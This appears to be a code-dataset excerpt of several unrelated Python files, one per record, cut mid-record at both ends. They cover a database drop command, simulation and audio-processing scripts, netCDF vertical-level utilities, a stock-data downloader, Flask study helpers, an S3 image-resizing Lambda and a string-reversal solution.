e:\n commands.echo(e, err=True)\n conn.autocommit = False\n elif db_engine == 'mysql':\n try:\n conn.execute('''DROP DATABASE IF EXISTS %s''' % db_name)\n except Exception as e:\n commands.echo(e, err=True)\n elif db_engine == 'mssql':\n try:\n conn.execute('''DROP DATABASE [%s]''' % db_name)\n except Exception as e:\n commands.echo(e, err=True)\n conn.autocommit = False\n elif db_engine == 'oracle':\n try:\n conn.execute('DROP USER usr_%s CASCADE' % db)\n except Exception as e:\n commands.echo(e, err=True)\n\n commands.echo('Database \"%s\" has been dropped successfully' % db_name)\n","sub_path":"orun/core/management/commands/dropdb.py","file_name":"dropdb.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"580710681","text":"#!/sw/bin/python2.7\n\nimport subprocess, shlex\nimport numpy as np\nfrom tqdm import tqdm\nfrom multiprocessing import Pool\nimport sys\nimport re\n#import rr_proposed_ckpt_sim_mod as sim\nimport rr_proposed_isolated_sim_mod as sim\n\nRANGE=512\n\ndef f(cmd):\n return sim.main(len(sys.argv), sys.argv, shlex.split(cmd))\n\npar = int(sys.argv[1])\npar = 2 if par < 2 else par\nmax_par_runs = int(par/2)\np = re.compile('^Process\\s[0-9]+,')\nfilter_fn = lambda x: filter(lambda l: p.match(l), x.split('\\n'))\n\ndef prefix_details_fn(run, policy, lst):\n return map(lambda s: '%d, %s, %s\\n' % (run, policy, s), lst)\n\npool = Pool(processes=par)\nfor oci in range(1):\n run_num = 1\n #lightAppCkpts = int(sys.argv[3])\n lightAppCkpts = 0\n #oci_factor = 1.0 + oci * 0.1\n oci_factor = float(sys.argv[2])\n aux_filename = \"aux-results-mtbf-5-oci-%.1f-ckpts-%d.csv\" % (oci_factor, lightAppCkpts)\n #results_filename = \"results-oci-%.1f-ckpts-%d.csv\" % (oci_factor, lightAppCkpts)\n aux = open(aux_filename, \"w\")\n aux.write(\"Run, Policy, Process #, Delta, Total Time, Useful Time, Ckpt Time, Lost Time, Job Failures, Total Failures\\n\")\n with tqdm(total=RANGE*1) as pbar:\n for i in range(int(RANGE/(max_par_runs))):\n computeTime = 100*1000/2\n cmdSort = \"-w -n 100 --run-time %d --mtbf 5 --oci-scale-factor %.1f\" % (computeTime, oci_factor)\n #cmdNoSort = \"-w -n 2 --run-time %d --mtbf 10 --ckpts-before-yield1 0 --ckpts-before-yield2 0\" % (computeTime)\n #a = [cmdSort, cmdNoSort]\n a = [cmdSort]\n arr = []\n for j in range(max_par_runs):\n arr.extend(a)\n res = pool.map(f, arr)\n for j in range(max_par_runs):\n #print res\n aux.writelines(prefix_details_fn(run_num, \"isolated\", filter_fn(res[0])))\n run_num += 1\n aux.writelines(prefix_details_fn(run_num, \"isolated\", filter_fn(res[1])))\n run_num += 1\n pbar.update(max_par_runs)\n \n aux.close()\n \npool.close()\npool.join()\n","sub_path":"results/multi-proc/parallel-run-isolated.py","file_name":"parallel-run-isolated.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"355202683","text":"from sys import argv\nimport numpy as np\nimport wave, struct, math\n\nstep = 2 ** (1.0/12.0)\nbase_tones = ['c', 'cis', 'd', 'es', 'e', 'f',\n 'fis', 'g', 'gis', 'a', 'bes', 'b']\n\ndef merge_peaks(peaks, frate):\n\n merged_peaks = []\n\n start = peaks[0][0]\n end = peaks[1][0]\n curr_peaks = peaks[0][1]\n\n for i in range(len(peaks)):\n peak = peaks[i]\n next_peak = peak\n\n if i+1 < len(peaks):\n next_peak = peaks[i+1]\n\n if np.array_equal(peak[1], curr_peaks):\n end = next_peak[0]\n\n else:\n merged_peaks.append((start, end, curr_peaks))\n start = peak[0]\n end = next_peak[0]\n curr_peaks = peak[1]\n\n merged_peaks.append((start, end, curr_peaks))\n return merged_peaks\n\ndef get_peaks(data_avg, frate):\n peaks = []\n\n i = 0;\n\n while (i + frate) <= len(data_avg):\n\n chunk = data_avg[i:i+frate]\n amps = np.abs(np.fft.rfft(chunk))\n chunk_avg = np.mean(amps)\n\n segment_peaks = {}\n p_start = None\n\n for j in range(0, len(amps)):\n if amps[j] >= (20 * chunk_avg):\n segment_peaks[j] = amps[j]\n\n top_peaks = []\n\n if len(segment_peaks) > 3:\n\n for _ in range(3):\n max_peak_idx = sorted(segment_peaks.items(), key=lambda kv: kv[1], reverse=True)[0][0]\n top_peaks.append(max_peak_idx)\n del segment_peaks[max_peak_idx]\n try:\n del segment_peaks[max_peak_idx - 1]\n del segment_peaks[max_peak_idx + 1]\n except KeyError:\n pass\n\n else:\n top_peaks = list(segment_peaks.keys())\n\n peaks.append((i, sorted(top_peaks)))\n\n i += int(frate / 10)\n\n return peaks\n\ndef frame_to_time(frame, frate):\n return frame / frate\n\ndef get_octave_and_pitch(freq):\n\n octave_start = base_freq * math.pow(2, -9/12)\n\n if (freq >= octave_start) and (freq < 2*octave_start):\n octave = 0\n elif freq < octave_start:\n i = -1\n while freq < (octave_start * (2 ** i)):\n i -= 1\n octave = i\n else:\n i = 2\n while freq >= (octave_start * (2 ** i)):\n i += 1\n octave = i-1\n\n octave_start *= math.pow(2, octave)\n\n curr_tone = octave_start\n next_tone = octave_start * step\n\n for id in range(12):\n\n if freq >= curr_tone and freq < next_tone:\n id, cents, octave_change = compute_cents(curr_tone, next_tone, freq, id)\n\n if octave_change:\n return (octave + 1, id, cents)\n\n return (octave, id, cents)\n\n curr_tone = next_tone\n next_tone *= step\n\n\ndef compute_cents(lower, higher, freq, id):\n\n cent_step = (higher - lower) / 100.0\n midpoint = lower + (50 * cent_step)\n\n if abs(lower - freq) < (cent_step / 2):\n return (id, None, None)\n\n if freq <= midpoint:\n cents = (freq - lower) / cent_step\n return (id, int(round(cents)), None)\n else:\n cents = (higher - freq) / cent_step\n cents = -1 * cents\n octave = None\n if id + 1 > 11:\n id = -1\n octave = 1\n return (id+1, int(round(cents)), octave)\n\ndef pitch_to_string(octave, id, cents):\n\n pitch = base_tones[id]\n\n if octave >= 0:\n pitch += abs(octave + 1) * \"'\"\n elif octave < -1:\n pitch = pitch[0].upper() + (pitch[1:] if len(pitch) >= 2 else \"\")\n pitch += abs(octave + 2) * ','\n\n if cents:\n if cents > 0:\n pitch += '+' + str(cents)\n elif cents < 0:\n pitch += '-' + str(abs(cents))\n else:\n pitch += '+0'\n\n return pitch\n\ndef filter_cluster(amps, cluster_start, cluster_end):\n if cluster_end - cluster_start == 1:\n return cluster_start\n\n cluster_max = cluster_start\n cluster_center = cluster_start + ((cluster_end - cluster_start) // 2)\n center_dist = abs(cluster_max - cluster_center)\n\n for i in range(cluster_start+1, cluster_end):\n if amps[i] > amps[cluster_max]:\n cluster_max = i\n center_dist = abs(cluster_max - cluster_center)\n elif amps[i] == amps[cluster_max]:\n if abs(i - cluster_center) < center_dist:\n cluster_max = i\n center_dist = abs(cluster_max - cluster_center)\n\n return cluster_max\n\nif __name__ == '__main__':\n\n base_freq = float(argv[1])\n fname = argv[2]\n\n with wave.open(fname, 'rb') as wav:\n\n data_size = wav.getnframes()\n frate = wav.getframerate()\n nchannels = wav.getnchannels()\n\n data = wav.readframes(data_size)\n\n data = np.array(struct.unpack('{n}h'.format(n=data_size*nchannels), data))\n\n data_per_channel = [data[offset::nchannels] for offset in range(nchannels)]\n data_avg = [sum(e)/len(e) for e in zip(*data_per_channel)]\n\n peaks = get_peaks(data_avg, frate)\n\n if len(peaks) > 0:\n merged_peaks = merge_peaks(peaks, frate)\n\n for m_peak in merged_peaks:\n start_time = frame_to_time(m_peak[0], frate)\n end_time = frame_to_time(m_peak[1], frate)\n\n result = str(start_time) + '-' + str(end_time) + ' '\n\n for peak in m_peak[2]:\n result += pitch_to_string(*get_octave_and_pitch(peak)) + ' '\n\n print(result)\n\n else:\n print('no peaks')\n","sub_path":"07-exercise/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"51241515","text":"\nimport copy\nimport subprocess\nimport warnings\n\nfrom nctoolkit.api import open_data\nfrom nctoolkit.cleanup import cleanup\nfrom nctoolkit.flatten import str_flatten\nfrom nctoolkit.runthis import run_this\nfrom nctoolkit.session import nc_safe\n\n\ndef bottom(self):\n \"\"\"\n Extract the bottom level from a dataset\n\n\n \"\"\"\n\n # extract the number of the bottom level\n # Use the first file for an ensemble\n # pull the cdo command together, then run it or store it\n if type(self.current) is list:\n ff = self.current[0]\n warnings.warn(\n message=\"The first file in ensemble used to determine number of vertical levels\"\n )\n else:\n ff = self.current\n\n cdo_result = subprocess.run(\n \"cdo nlevel \" + ff, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n ).stdout\n n_levels = int(\n str(cdo_result).replace(\"b'\", \"\").strip().replace(\"'\", \"\").split(\"\\\\n\")[0]\n )\n\n cdo_command = f\"cdo -sellevidx,{str(n_levels)}\"\n\n run_this(cdo_command, self, output=\"ensemble\")\n\n\ndef surface(self):\n \"\"\"\n Extract the top/surface level from a dataset\n\n \"\"\"\n\n cdo_command = \"cdo -sellevidx,1\"\n run_this(cdo_command, self, output=\"ensemble\")\n\n\ndef vertical_interp(self, levels=None):\n \"\"\"\n Verticaly interpolate a dataset based on given depths\n\n Parameters\n -------------\n levels : list, int or str\n list of vertical levels, for example depths for an ocan model, to vertical interpolate to. These must be floats or ints.\n\n \"\"\"\n\n if levels is None:\n raise ValueError(\"Please supply vertical depths\")\n\n # below used for checking whether vertical remapping occurs\n\n # first a quick fix for the case when there is only one vertical depth\n\n if (type(levels) == int) or (type(levels) == float):\n levels = {levels}\n\n for vv in levels:\n if (type(vv) is not float) and (type(vv) is not int):\n raise TypeError(f\"{vv} is not a valid depth\")\n\n levels = str_flatten(levels, \",\")\n cdo_command = f\"cdo -intlevel,{levels}\"\n\n run_this(cdo_command, self, output=\"ensemble\")\n\n\ndef vertstat(self, stat=\"mean\"):\n \"\"\"Method to calculate the vertical mean from a function\"\"\"\n cdo_command = f\"cdo -vert{stat}\"\n\n run_this(cdo_command, self, output=\"ensemble\")\n\n # clean up the directory\n\n\ndef vertical_mean(self):\n \"\"\"\n Calculate the depth-averaged mean\n \"\"\"\n\n return vertstat(self, stat=\"mean\")\n\n\ndef vertical_min(self):\n \"\"\"\n Calculate the vertical minimum of variable values\n \"\"\"\n\n return vertstat(self, stat=\"min\")\n\n\ndef vertical_max(self):\n \"\"\"\n Calculate the vertical maximum of variable values\n \"\"\"\n\n return vertstat(self, stat=\"max\")\n\n\ndef vertical_range(self):\n \"\"\"\n Calculate the vertical range of variable values\n \"\"\"\n\n return vertstat(self, stat=\"range\")\n\n\ndef vertical_sum(self):\n \"\"\"\n Calculate the vertical sum of variable values\n \"\"\"\n\n return vertstat(self, stat=\"sum\")\n\n\ndef vertical_cum(self):\n \"\"\"\n Calculate the vertical sum of variable values\n \"\"\"\n\n return vertstat(self, stat=\"cum\")\n\n\ndef invert_levels(self):\n \"\"\"\n Invert the levels of 3D variables\n \"\"\"\n cdo_command = \"cdo -invertlev\"\n\n run_this(cdo_command, self, output=\"ensemble\")\n\n\ndef bottom_mask(self):\n \"\"\"\n Create a mask identifying the deepest cell without missing values.\n 1 identifies the deepest cell with non-missing values. Everything else is 0, or missing.\n At present this method only uses the first available variable from netcdf files, so it may not be suitable for all data\n \"\"\"\n self.run()\n\n if type(self.current) is list:\n raise TypeError(\"This only works for single file datasets\")\n data = open_data(self.current)\n\n if len(data.variables_detailed.query(\"levels>1\")) == 0:\n raise ValueError(\"There is only one vertical level in this file!\")\n\n var_use = data.variables_detailed.query(\"levels>1\").variable[0]\n data.select_variables(var_use)\n data.select_timestep(0)\n data.set_missing([0, 0])\n data.transmute({\"Wet\": var_use + \" == \" + var_use})\n data.invert_levels()\n data.run()\n bottom = data.copy()\n bottom.vertical_cum()\n bottom.compare_all(\"==1\")\n bottom.multiply(data)\n bottom.invert_levels()\n bottom.rename({\"Wet\": \"bottom\"})\n bottom.set_longnames({\"bottom\": \"Identifier for cell nearest seabed\"})\n bottom.set_missing([0, 0])\n bottom.run()\n\n self.current = copy.deepcopy(bottom.current)\n\n self.history = copy.deepcopy(bottom.history)\n self._hold_history = copy.deepcopy(self.history)\n\n cleanup()\n","sub_path":"nctoolkit/verticals.py","file_name":"verticals.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"544673030","text":"from pykiwoom.kiwoom import *\r\nimport time\r\n\r\nkiwoom = Kiwoom()\r\nkiwoom.CommConnect(block=True)\r\n\r\n# 전종목 일봉데이터를 엑셀로 저장하기\r\n# 전종목 종목코드\r\nkospi = kiwoom.GetCodeListByMarket('0')\r\nkosdaq = kiwoom.GetCodeListByMarket('10')\r\ncodes = kospi + kosdaq\r\n\r\n# 문장열로 오늘 날짜 얻기\r\nnow = datetime.datetime.now()\r\ntoday = now.strftime('%Y%m%d')\r\n\r\nnum = 1\r\n# 전 종목의 일봉 데이터\r\n# enumerate 몇 번째 반복문인지 확인하고 싶을때 튜플형태로 반환\r\n# 그래서 i로 몇 번째 인지 알 수 있음(index, list의 element) 형태\r\n# TR 요청 안했었음 한 번에 600개 행만 보내줌\r\n# 장시작까지는 8700개의 행이 필요함\r\nfor i, code, in enumerate(codes):\r\n if i < 627:\r\n continue # 20210903 13:04 441까지하다가 lock걸림\r\n dfs=[]\r\n print(f\"{i}/{len(codes)} {code}\")\r\n df = kiwoom.block_request(\"opt10081\",\r\n 종목코드=code,\r\n 기준일자=today,\r\n 수정주가구분=1,\r\n output=\"주식일봉차트조회\",\r\n next=0)\r\n dfs.append(df)\r\n\r\n while kiwoom.tr_remained:\r\n print(\"{}th 종목의 Data가 남아있어 추가 TR 요청을 {} 번째 중입니다.\".format(i, num))\r\n df = kiwoom.block_request(\"opt10081\",\r\n 종목코드=code,\r\n 기준일자=today,\r\n 수정주가구분=1,\r\n output=\"주식일봉차트조회\",\r\n next=2)\r\n dfs.append(df)\r\n num += 1\r\n # 시간 더 늘렸음 - 296번째에서 과도한 traffic 발생한다고 함\r\n time.sleep(2.5)\r\n\r\n print(\"TR 추가 요청이 끝났습니다.\")\r\n df = pd.concat(dfs)\r\n num = 1\r\n out_name = f\"{code}.xlsx\"\r\n\r\n df.to_excel(out_name)\r\n time.sleep(4.5)\r\n\r\nprint(\"ALL TR finished\")","sub_path":"TR.py","file_name":"TR.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"414302763","text":"from flask import session, g, json\nfrom attrdict import AttrDict\n\nfrom .models import Study\nfrom .security import current_user\nfrom .users import get_hydrauser, get_hydraurl, save_user_settings, \\\n get_hydrausers\n\nfrom openagua import db\n\n\ndef add_study(hydrauser_id, project_id):\n study = Study()\n study.hydrauser_id = hydrauser_id\n study.project_id = project_id\n db.session.add(study)\n db.session.commit()\n\n session['project_id'] = project_id\n session['study_id'] = study.id\n\n return study\n\n\ndef update_study(id, updates):\n Study.query.filter_by(id=id).update(updates)\n db.session.commit()\n return\n\n\ndef delete_studies(hydra_userid, network_id):\n Study.query.filter_by(hydra_userid=hydra_userid, network_id=network_id).delete()\n db.session.commit()\n\n\ndef delete_study(study_id):\n Study.query.filter_by(id=study_id).delete()\n db.session.commit()\n\n\ndef get_study(**kwargs):\n if 'project_id' in kwargs and 'hydrauser_id' in kwargs:\n study = Study.query.filter_by(\n project_id=kwargs['project_id'],\n hydrauser_id=kwargs['hydrauser_id']\n ).first()\n if not study:\n study = add_study(kwargs['hydrauser_id'], kwargs['project_id'])\n\n elif 'study_id' in kwargs:\n study_id = kwargs['study_id']\n study = Study.query.filter_by(id=study_id).first()\n\n else:\n study = None\n\n return study\n\n\ndef get_studies(**kwargs):\n studies = []\n if 'hydrauser_id' in kwargs:\n studies = Study.query.filter_by(hydrauser_id=kwargs['hydrauser_id'])\n elif 'url' in kwargs:\n hydrausers = get_hydrausers(url=kwargs['url'])\n for hydrauser in hydrausers:\n studies.extend(Study.query.filter_by(hydrauser_id=hydrauser.id))\n return studies\n\n\ndef activate_study(**kwargs):\n if 'study_id' in kwargs:\n study_id = kwargs['study_id']\n elif 'hydrauser_id' in kwargs and 'project_id' in kwargs:\n study = get_study(**kwargs)\n study_id = study.id\n else:\n study_id = None\n if study_id:\n save_user_settings(current_user, 'active_study', study_id)\n\n\ndef load_active_study(load_from_hydra=False):\n\n settings = current_user.settings\n if settings:\n settings = json.loads(settings)\n else:\n settings = {}\n\n if 'active_study' in settings:\n study = get_study(study_id=settings['active_study'])\n elif 'study_id' in session and session['study_id']:\n study = get_study(study_id=session['study_id'])\n save_user_settings(current_user, 'active_study', study.id)\n else:\n study = None\n\n if study:\n session['study_id'] = study.id\n session['project_id'] = study.project_id\n session['hydrauser_id'] = study.hydrauser_id\n\n g.hydrauser = get_hydrauser(id=study.hydrauser_id)\n hydraurl = get_hydraurl(id=g.hydrauser.hydra_url_id)\n session['hydra_url'] = hydraurl.url\n\n g.study = study\n\n else:\n g.study = None\n session['study_id'] = None\n session['project_id'] = None\n\n if load_from_hydra and g.study:\n\n # get project\n result = g.conn.get_project(g.study.project_id)\n if 'faultcode' in result:\n g.project = None\n session['project_name'] = None\n else:\n g.project = result\n session['project_name'] = g.project.name\n\n # get network\n result = g.conn.get_network(g.study.active_network_id, include_data)\n if 'faultcode' in result:\n g.network = None\n else:\n g.network = result\n\n # get template\n result = g.conn.get_template(g.study.active_template_id)\n if 'faultstring' in result:\n g.template = None\n else:\n g.template = result\n g.ttypes = {}\n g.ttype_dict = {}\n for ttype in g.template.types:\n g.ttypes[ttype.id] = ttype\n g.ttype_dict[ttype.name] = ttype.id\n\n if g.study and type(g.study.settings) is str:\n g.study_settings = AttrDict(json.loads(g.study.settings))\n else:\n g.study_settings = AttrDict({})\n\n\ndef add_default_project(conn, user):\n project_name = user.email\n project_description = 'Default project created for {} {} ({})'.format(\n user.firstname,\n user.lastname,\n user.email\n )\n\n # add project\n project = conn.call('add_project', {'project': {'name': project_name, 'description': project_description}})\n\n return project\n","sub_path":"openagua/studies.py","file_name":"studies.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"299988369","text":"from PIL import Image\nimport tempfile\nfrom boto3.session import Session\ndef lambda_handler(event, context):\n print(\"start\")\n session = Session(aws_access_key_id='',\n aws_secret_access_key='', region_name='ap-northeast-1')\n print(\"s3\")\n s3 = session.resource(\"s3\")\n print(\"images-from\")\n bucket = s3.Bucket('images-from')\n dir_images = tempfile.TemporaryDirectory()\n print(dir_images.name)\n for obj in bucket.objects.all():\n print(\"download_file:\"+obj.key)\n s3.meta.client.download_file('images-from', obj.key, dir_images.name + '\\\\' + obj.key)\n print(\"Image.open:\" + obj.key)\n img = Image.open(dir_images.name + '\\\\' + obj.key)\n w, h = img.size\n img.thumbnail((w // 2, h // 2))\n print(\"img.save:\" + obj.key)\n img.save(dir_images.name + '\\\\' + obj.key)\n s3.meta.client.upload_file(dir_images.name + '\\\\' + obj.key, 'images-to', obj.key)\n print(\"uploaded:\" + obj.key)\n dir_images.cleanup()\n print('end')\n return {\n 'statusCode': 200\n }\n\n\n","sub_path":"image_resize/lambda_function3.py","file_name":"lambda_function3.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563559092","text":"# 给定一个字符串,你需要反转字符串中每个单词的字符顺序,同时仍保留空格和单词的初始顺序。 \n# \n# \n# \n# 示例: \n# \n# 输入:\"Let's take LeetCode contest\"\n# 输出:\"s'teL ekat edoCteeL tsetnoc\"\n# \n# \n# \n# \n# 提示: \n# \n# \n# 在字符串中,每个单词由单个空格分隔,并且字符串中不会有任何额外的空格。 \n# \n# Related Topics 字符串 \n# 👍 245 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def reverseWords1(self, s: str) -> str:\n \"\"\"\n 手写api\n \"\"\"\n\n def reverse(left, right):\n while left < right:\n s[left], s[right] = s[right], s[left]\n left += 1\n right -= 1\n\n def reverse_each_word():\n n = len(s)\n start = end = 0\n while start < n:\n # 找到每个单词的末尾\n while end < n and s[end] != ' ':\n end += 1\n # 翻转当前单词\n reverse(start, end - 1)\n # 更新start,去找下一个单词\n start = end + 1\n end += 1\n\n s = list(s)\n reverse_each_word()\n return ''.join(s)\n\n def reverseWords(self, s: str) -> str:\n \"\"\"\n 将s按空格分割 --> 按单词翻转 --> 转回string\n \"\"\"\n return ' '.join(word[::-1] for word in s.split())\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_09/day61_[557]反转字符串中的单词 III_homework.py","file_name":"day61_[557]反转字符串中的单词 III_homework.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"468782402","text":"# coding=utf8\nimport os\nimport numpy as np\nimport random\nimport re\nimport soundfile as sf\nimport resampy\nimport librosa\nimport argparse\nimport yaml\n\nclass AttrDict(dict):\n def __init__(self, *args, **kwargs):\n super(AttrDict, self).__init__(*args, **kwargs)\n self.__dict__ = self\n\n\ndef read_config(path):\n return AttrDict(yaml.load(open(path, 'r')))\n\n# Add the config.\nparser = argparse.ArgumentParser(description='predata scripts.')\nparser.add_argument('-config', default='config_WSJ0.yaml', type=str,\n # parser.add_argument('-config', default='config_mix.yaml', type=str,\n help=\"config file\")\nopt = parser.parse_args()\nconfig = read_config(opt.config)\n\nchannel_first = config.channel_first\nnp.random.seed(1) # 设定种子\nrandom.seed(1)\n\naim_path = '../../../../DL4SS_Keras/Torch_multi/Dataset_Multi/1/' + config.DATASET\naim_path = '../../DL4SS_Keras/Torch_multi/Dataset_Multi/1/' + config.DATASET\n# aim_path = '../../../DL4SS_Keras/Torch_multi/Dataset_Multi/1/' + config.DATASET\n# 训练文件列表\nTRAIN_LIST = aim_path + '/train_list'\n# 验证文件列表\nVALID_LIST = aim_path + '/valid_list'\n# 测试文件列表\nTEST_LIST = aim_path + '/test_list'\n# 未登录文件列表\nUNK_LIST = aim_path + '/unk_list'\n\noutput_tmp_wav = 0\nnum_rounds= 2\naverage_speech_len = int(0.2 * config.FRAME_RATE)\nconfig.silence_dur = 2 * config.FRAME_RATE\n\ndef random_len(length,ratio=0.5):\n return length+random.randint(-1.0*ratio*length,1.0*ratio*length)\n\ndef pad_list(xs, pad_value):\n n_batch = len(xs)\n max_len = max(x.size(0) for x in xs)\n pad = xs[0].new(n_batch, max_len, * xs[0].size()[1:]).fill_(pad_value)\n for i in range(n_batch):\n pad[i, :xs[i].size(0)] = xs[i]\n return pad\n\ndef get_energy_order(multi_spk_fea_list):\n # Input: B个dict,每个dict里是名字和fea\n order=[]\n for one_line in multi_spk_fea_list:\n dd=sorted(list(one_line.items()),key= lambda d:d[1].sum(),reverse=True)\n dd=[d[0] for d in dd]\n order.append(dd)\n return order\n\ndef _collate_fn(mix_data,source_data,raw_tgt=None):\n \"\"\"\n Args:\n batch: list, len(batch) = 1. See AudioDataset.__getitem__()\nReturns:\n mixtures_pad: B x T, torch.Tensor\n ilens : B, torch.Tentor\n sources_pad: B x C x T, torch.Tensor\n \"\"\"\n mixtures, sources = mix_data,source_data\n if raw_tgt is None: #如果没有给定顺序\n raw_tgt = [sorted(spk.keys()) for spk in source_data]\n # sources= models.rank_feas(raw_tgt, source_data,out_type='numpy') # 这里是目标的图谱,aim_size,wav_len\n sources=[]\n for each_feas, each_line in zip(source_data, raw_tgt):\n sources.append(np.stack([each_feas[spk] for spk in each_line]))\n sources=np.array(sources)\n\n # get batch of lengths of input sequences\n ilens = np.array([mix.shape[0] for mix in mixtures])\n\n # perform padding and convert to tensor\n pad_value = 0\n # mixtures_pad = pad_list([mix.float() for mix in mixtures], pad_value)\n ilens = ilens\n # sources_pad = pad_list([torch.from_numpy(s).float() for s in sources], pad_value)\n # N x T x C -> N x C x T\n # sources_pad = sources_pad.permute((0, 2, 1)).contiguous()\n return mixtures, ilens, sources\n # return mixtures_pad, ilens, sources_pad\n\ndef split_forTrainDevTest(spk_list, train_or_test):\n '''为了保证一个统一的训练和测试的划分标准,不得不用通用的一些方法来限定一下,\n 这里采用的是用sorted先固定方法的排序,那么不论方法或者seed怎么设置,训练测试的划分标准维持���变,\n 也就是数据集会维持一直'''\n length = len(spk_list)\n # spk_list=sorted(spk_list,key=lambda x:(x[1]))#这个意思是按照文件名的第二个字符排序\n # spk_list=sorted(spk_list)#这个意思是按照文件名的第1个字符排序,暂时采用这种\n spk_list = sorted(spk_list, key=lambda x: (x[-1])) # 这个意思是按照文件名的最后一个字符排序\n # TODO:暂时用最后一个字符排序,这个容易造成问题,可能第一个比较不一样的,这个需要注意一下\n if train_or_test == 'train':\n return spk_list[:int(round(0.7 * length))]\n elif train_or_test == 'valid':\n return spk_list[(int(round(0.7 * length)) + 1):int(round(0.8 * length))]\n elif train_or_test == 'test':\n return spk_list[(int(round(0.8 * length)) + 1):]\n else:\n raise ValueError('Wrong input of train_or_test.')\n\n\ndef prepare_datasize(gen):\n data = gen.next()\n # 此处顺序是 mix_speechs.shape,mix_feas.shape,aim_fea.shape,aim_spkid.shape,query.shape\n # 一个例子:(5, 17040) (5, 134, 129) (5, 134, 129) (5,) (5, 32, 400, 300, 3)\n # 暂时输出的是:语音长度、语音频率数量、视频截断之后的长度\n # print('datasize:', data[1].shape[1], data[1].shape[2], data[4].shape[1], data[-1], (data[4].shape[2], data[4].shape[3]))\n return data[1].shape[1], data[1].shape[2], data[4].shape[1], data[-1], (data[4].shape[2], data[4].shape[3])\n\n\ndef prepare_data(mode, train_or_test, min=None, max=None):\n '''\n :param\n mode: type str, 'global' or 'once' , global用来获取全局的spk_to_idx的字典,所有说话人的列表等等\n train_or_test:type str, 'train','valid' or 'test'\n 其中把每个文件夹每个人的按文件名的排序的前70%作为训练,70-80%作为valid,最后20%作为测试\n :return:\n '''\n # 如错有预订的min和max,主要是为了主程序做valid的时候统一某个固定的说话人的个数上\n if min:\n config.MIN_MIX = min\n if max:\n config.MAX_MIX = max\n\n mix_speechs = np.zeros((config.batch_size, 2*config.MAX_LEN+config.silence_dur))\n mix_feas = [] # 应该是bs,n_frames,n_fre这么多\n mix_phase = [] # 应该是bs,n_frames,n_fre这么多\n mix_angle = [] # 应该是bs,n_frames,n_fre这么多\n aim_fea = [] # 应该是bs,n_frames,n_fre这么多\n aim_spkid = [] # np.zeros(config.batch_size)\n aim_spkname = [] # np.zeros(config.batch_size)\n query = [] # 应该是batch_size,shape(query)的形式,用list再转换把\n multi_spk_fea_list = [] # 应该是bs个dict,每个dict里是说话人name为key,clean_fea为value的字典\n multi_spk_wav_list = [] # 应该是bs个dict,每个dict里是说话人name为key,clean_fea为value的字典\n multi_spk_angle_list = [] # 应该是bs个dict,每个dict里是说话人name为key,clean_fea为value的字典\n\n # 目标数据集的总data,底下应该存放分目录的文件夹,每个文件夹应该名字是sX\n data_path = aim_path + '/data'\n # 语音刺激\n if config.MODE == 1:\n if config.DATASET == 'WSJ0': # 开始构建数据集\n WSJ0_eval_list = ['440', '441', '442', '443', '444', '445', '446', '447']\n WSJ0_test_list = ['22g', '22h', '050', '051', '052', '053', '420', '421', '422', '423']\n all_spk_train = os.listdir(data_path + '/train')\n all_spk_eval = os.listdir(data_path + '/eval')\n all_spk_test = os.listdir(data_path + '/test')\n all_spk_evaltest = os.listdir(data_path + '/eval_test')\n all_spk = all_spk_train + all_spk_eval + all_spk_test\n spk_samples_list = {}\n batch_idx = 0\n list_path = '../../../../DL4SS_Keras/TDAA_beta/create-speaker-mixtures/'\n list_path = '../../DL4SS_Keras/TDAA_beta/create-speaker-mixtures/'\n # list_path = '../../../DL4SS_Keras/TDAA_beta/create-speaker-mixtures/'\n all_samples_list = {}\n sample_idx = {}\n number_samples = {}\n batch_mix = {}\n mix_number_list = range(config.MIN_MIX, config.MAX_MIX + 1)\n number_samples_all = 0\n for mix_k in mix_number_list:\n if train_or_test == 'train':\n aim_list_path = list_path + 'mix_{}_spk_tr.txt'.format(mix_k)\n if train_or_test == 'valid':\n aim_list_path = list_path + 'mix_{}_spk_cv.txt'.format(mix_k)\n if train_or_test == 'test':\n aim_list_path = list_path + 'mix_{}_spk_tt.txt'.format(mix_k)\n\n all_samples_list[mix_k] = open(aim_list_path).readlines()#[:31]\n number_samples[mix_k] = len(all_samples_list[mix_k])\n batch_mix[mix_k] = len(all_samples_list[mix_k]) / config.batch_size\n number_samples_all += len(all_samples_list[mix_k])\n\n sample_idx[mix_k] = 0 # 每个通道从0开始计数\n\n if train_or_test == 'train' and config.SHUFFLE_BATCH:\n random.shuffle(all_samples_list[mix_k])\n print('\\nshuffle success!', all_samples_list[mix_k][0])\n\n batch_total = number_samples_all / config.batch_size\n print('batch_total_num:', batch_total)\n\n mix_k = random.sample(mix_number_list, 1)[0]\n mix_speechs = np.zeros((config.batch_size, num_rounds * average_speech_len * mix_k))\n # while True:\n for ___ in range(number_samples_all):\n if ___ == number_samples_all - 1:\n print('ends here.___')\n yield False\n mix_len = 0\n print(mix_k, 'mixed sample_idx[mix_k]:', sample_idx[mix_k], batch_idx)\n if sample_idx[mix_k] >= batch_mix[mix_k] * config.batch_size:\n print(mix_k, 'mixed data is over~trun to the others number.')\n mix_number_list.remove(mix_k)\n try:\n mix_k = random.sample(mix_number_list, 1)[0]\n except ValueError:\n print('seems there gets all over.')\n if len(mix_number_list) == 0:\n print('all mix number is over~!')\n yield False\n # 